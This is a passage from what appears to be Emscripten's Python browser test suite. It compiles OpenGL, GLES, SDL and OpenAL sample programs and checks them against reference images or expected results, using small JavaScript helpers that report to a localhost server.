'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')),
args=args)
@requires_graphics_hardware
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
# NOTE: Should FULL_ES3=1 imply client-side vertex arrays? The emulation needs FULL_ES2=1 for now.
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'USE_WEBGL2=1', '-s', 'FULL_ES2=1', '-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
run_process([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
self.compile_btest([path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
self.set_setting('ASM_JS', 1)
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
for wasm in [0, 1]:
if not wasm and self.is_wasm_backend():
continue
print(wasm)
main, supp = self.setup_runtimelink_test()
create_test_file('supp.cpp', supp)
self.compile_btest(['supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'EXPORT_ALL=1'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]', '-s', 'EXPORT_ALL=1'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [['-s', 'WASM=0'], ['-s', 'WASM=1']]:
if 'WASM=0' in mode and self.is_wasm_backend():
continue
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
